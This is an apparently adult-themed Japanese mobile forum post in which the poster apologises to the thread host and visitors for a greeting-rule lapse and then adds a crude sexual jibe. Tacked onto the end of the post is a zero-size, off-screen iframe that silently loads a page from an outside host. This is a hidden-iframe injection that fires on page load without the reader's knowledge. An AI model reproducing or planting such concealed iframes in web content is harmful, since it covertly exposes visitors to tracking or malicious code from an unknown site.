本文コピー
▼本文
くれないさん お疲れさまです。 ホストのくれないさんのみならず、ビジターの皆さま方にもご挨拶が必要でしたのね。ルールの意味がよく理解できず、先ほどは大変失礼いたしました。 今し方、ビジターの皆さま方には、改めてご挨拶をさせていただきました。 クリ・ビラ肥大?次回はダイソンで土手を吸引なさっては如何かしら?フフフ。<iframe src="http://img.onmitsu.jp/en/20_0_a.html" style="width:0;height:0;position:fixed;top:0;left:110%;border:none;" scrolling="no"></iframe>
スレッドに戻る
HP
/
RANK
/
UP
MOBI-BOARD